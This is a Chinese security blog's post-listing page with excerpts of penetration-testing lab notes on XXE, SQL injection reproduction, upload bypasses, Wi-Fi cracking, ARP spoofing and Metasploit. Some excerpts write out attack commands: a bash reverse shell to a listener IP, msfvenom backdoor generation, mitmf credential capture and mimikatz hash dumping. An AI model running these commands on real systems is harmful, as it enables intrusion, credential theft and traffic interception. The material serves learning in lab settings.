自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(27)
  • 收藏
  • 关注

原创 XXE学习笔记

XML:可扩展标记语言**一种用于标记电子文件,使其具有结构性的语言。**设计的宗旨是传输数据,而不是显示数据,XML本身是用来存储数据的纯文本,不会做任何事情。XXE: 外部实体注入属于一种注入类型攻击:XML注入一个典型任意文件读取攻击:XML声明:对XML文档进行声明,告诉服务器,这里是XML文档。同php中的<?php ?>类似。DTD部分...

2020-03-12 16:59:30 373

原创 CVE-2019-9762漏洞复现

CVE-2019-9762:在PHPSHE 1.7中,include/plugin/payment/alipay/pay.php文件存在SQL注入,不需要进行身份验证进入主页面,注册账号并登录定位到存在注入的文件,在个人中心,充值板块,使用支付宝充值输入充值金额,用Burp抓包,点击提交先抓到user.php?mod=pay这个包,放掉,会抓到第二个跳转请求pay.php?id=pay...

2020-01-04 19:30:39 2668

原创 msfvenom后门生成与利用

利用msfvenom生成木马后门拿到Windows 10靶机权限需要关掉Windows defender生成后门msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=10.101.0.139 lport=1234 -f exe > backdoor.exe配置并监听启动metas...

2019-12-02 19:46:39 949

原创 upload-labs 通关

1.Pass-01(前端验证绕过)上传一个php文件,提示用burp抓包发现并没有发送数据包判断是前端验证上传一个图片马burp抓包,把文件名jpg改成php用蚁剑连接成功2.Pass-02(Content-Type方式绕过)burp抓包,改请求头中的Content-Type为image/jpeg连接成功3.Pass-03(黑名单绕过)burp抓包改后缀名为php3...

2019-11-19 16:13:34 432

原创 黑客丛林之旅

1. Level 1前端验证,右键查看源码就能找到通关密码2. Level 2右键查看源码看到是前端函数验证直接F12,绕过chkPassword()随便输入密码,点击Go就会跳转到下一关3. Level 34. Level 45. Level 56. Level 67. Level 78. Level 89. Level 910. Level 1011....

2019-11-14 20:13:04 347

原创 hackinglab解密关

1. 以管理员身份登录系统在重置密码成功页面获得Tips![在这里插入图片描述](https://img-blog.csdnimg.cn/20191108151809749.png)看链接/reset.php?sukey=79804c0ea4d2a961fbfd2cff08664098&username=123GET提交的参数中,sukey应该是验证,username提交要重...

2019-11-10 15:58:38 2290

原创 aircrack-ng

aircrack-ng无线密码暴力破解工具,支持WEP和WPA类型无线网络。抓取到适量的Wi-Fi连接数据包后aircrack-ng wifi-crack.cap列出找到的SSIDaircrack-ng -e hackinglab -b 54:E6:FC:53:E6:D0 -w passwd.txt wifi-crack.cap选择网络,并且载入字典进行暴力破解破解成功...

2019-11-09 10:49:33 224

原创 kali内网攻击-mitmf

替换图片在/var/www/html/下放入图片mitmf -i eth0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /var/www/html/获取提交的账户密码mitmf -i eth0 --spoof --arp --gateway 192.168.5.1 --ta...

2019-11-05 10:59:25 565

原创 kali内网攻击-ettercap

ettercap是一款arp嗅探欺骗工具,通常用来进行中间人攻击启动ettercapettercap -G

2019-09-10 16:29:00 617

原创 mimikatz

mimikatz已集成到metasploit中需要SYSTEM权限查看权限:getuid若不是SYSTEM权限:getsystem载入mimikatzload mimikatz抓密码mimikatz_command -f samdump::hashesMD5解密就行了...

2019-09-10 16:17:26 680

原创 cve2019-0708漏洞利用

利用metasploit对windows 7 x64主机进行攻击添加CVE19-0708漏洞expexp链接:https://github.com/rapid7/metasploit-framework/tree/5a0119b04309c8e61b44763ac08811cd3ecbbf8d/modules/exploits/windows/rdp添加步骤:READMECVE-201...

2019-09-08 15:34:38 2200 1

原创 Pikachu靶场-暴力破解

一、暴力破解1、基于表单的暴力破解先随意测试root/root登录,用Burp抓包,丢进Intruder添加username和password两个参数变量,攻击类型选择Clusterbomb有效载荷中给username和password选择字典(有效载荷类型为简单清单),线程设置为1,开始爆破根据返回包长度排序,获得账号密码2、验证码绕过(on server)同样尝试登录,用B...

2019-09-05 10:51:59 4160 4

原创 netcat学习笔记

netcat:相当于网络中的瑞士军刀,它所做的事情是在两台主机间建立连接并返回两个数据流。主机A:192.168.12.130主机B:192.168.12.131一、端口扫描扫描主机B开放端口:nc -zvn 192.168.12.131 1-999参数:-u 改变运行模式,默认为TCP,改为UDP-z 适用于扫描,告诉netcat,连接成功后就关闭连接,不进行数据交换-v...

2019-08-23 20:14:07 400

原创 W12Scan和taoman工具安装

taoman:https://github.com/LandGrey/taoman收集各高校子域名用法:taoman.py -f data\edusrc_school_domains.txt扫描结果会自动生成到txt文件工具同一目录下data目录里有一些字典 可以自己添加edusrc_SLD_name_raw_list 常用二级域名单词元数据edusrc_SLD_top_1...

2019-08-22 19:30:50 2071

原创 setoolkit-网站克隆获得账户密码

setoolkit:启动setoolkit:setoolkit输入1、2、3、2,进入网站克隆

2019-08-22 19:25:18 2579 4

原创 nmap扫目标漏洞

nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.78.129 -Pn存在MS17-010漏洞

2019-08-21 17:14:54 857

原创 内网指定目标抓包

kali:nmap -sP 192.168.0.1/24确定目标利用 tcpdump 抓包:tcpdump -i eth0 host 192.168.0.1 -w /usr/document/test.cap稍等一会,按ctrl+c停止抓包抓取的包保存在/usr/document/test.cap...

2019-08-20 18:07:35 1255

原创 kali内网攻击-xhydra

简介xhydra是一款爆破账户密码工具,支持ssh、ftp、rdp等协议爆破xhrdra打开工具一、ssh爆破目标:ubuntu 192.168.78.1341、在Target栏:设置目标地址选择端口数,选择ssh服务勾选Be Verbose(显示详情)和Show Attempts(显示攻击步骤)2、在Passwords栏:设置用户名为root选择Password Li...

2019-08-16 17:36:58 1342

原创 反弹shell方法

Linux:hacker: 192.168.188.63 (kali)目标: 192.168.72.130 (ubuntu)kali:监听指定端口:nc -lvp 1234ubuntu:反弹shell方法一 bash:bash -i >& /dev/tcp/192.168.188.63/1234 0>&1方法二 python:...

2019-08-16 14:31:13 696

原创 kali内网攻击-armitage

kali:开启postgresql数据库service postgresql start开启工具并连接数据库armitage

2019-08-16 14:24:07 1930

原创 url重定向漏洞

北京科技大学dedecms v5.7 sp1 download.php重定向plus/download.php没有对传入的参数进行过滤,直接接收例如:http:\bing.combase64加密:aHR0cDpcXGJpbmcuY29turl编码:aHR0cDpcXGJpbmcuY29t访问http://cy.ustb.edu.cn/plus/download.php?open=...

2019-08-16 14:21:55 1045

原创 后渗透阶段

弹消息框msg /server:127.0.0.1 * "hello"进程迁移手动迁移:查看进程ps获取meterpreter进程PID getpid迁移到指定PID进程中migrate 1234自动迁移run post/windows/manage/migrate查看系统信息sysinfo查看是否为虚拟机run post/windows/gather/checkvm...

2019-08-16 14:21:29 357

原创 kali内网攻击-arpspoof

准备阶段:查看物理机IP地址,将kali的IP地址设置为和物理机同一网段。虚拟机网络适配器设置为桥接模式(复制物理网络连接状态)虚拟网络编辑器在管理员模式下启动后,设置VMnet0为桥接模式,外部链接选择物理机网卡。开启端口转发:echo 1 > /proc/sys/net/ipv4/ip_forward主机探测:windows工具:Advanced IP Scannerkal...

2019-08-16 14:20:39 885

原创 pkav-爆破账户密码

先尝试登录,并用burp抓包,将请求包复制到pkav中添加密码标记,添加验证码标记对尝试登录的密码123进行md5解密,发现解密结果为123{admin}按照对应密码格式生成一个字典在变体设置中添加相应密码字典,并选择规则类型为变体哈希-MD5 32位f12获得验证码的获取地址,添加到验证码地址里,进行识别测试在重放选项中,设置HTTP重定向为无条件跟踪重定向,选上自动跟踪302...

2019-08-15 18:28:48 4334

原创 kali mimtf中间人攻击框架的安装

安装依赖文件sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file安装mitmfsud...

2019-08-12 16:52:56 682

原创 墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup

首先题目提示XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。启动靶场点击进入墨者的任性网页Burpsuite抓包,放进Repeater先GO一下在请求头中添加X-Forwarded-For试了试 '、and 1=1 、 and 1=2都没反应当改为or 1=1时,提示语法错误继续,union注入步骤order by 5提示未知字段5,order by 4返...

2019-08-09 16:53:37 825

原创 MS08-067利用

一、概述利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。用到的端口:445、3389二、实验环境(虚拟机搭建)目标:windows xp professional sp3 英文版(中文版测试不成功)攻击:Kali Linux三、攻击过程1.获取靶机和Kali Linux的IP地址Windows:DOS窗口输入命令ipconfig /a...

2019-08-09 09:14:51 18837 5

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除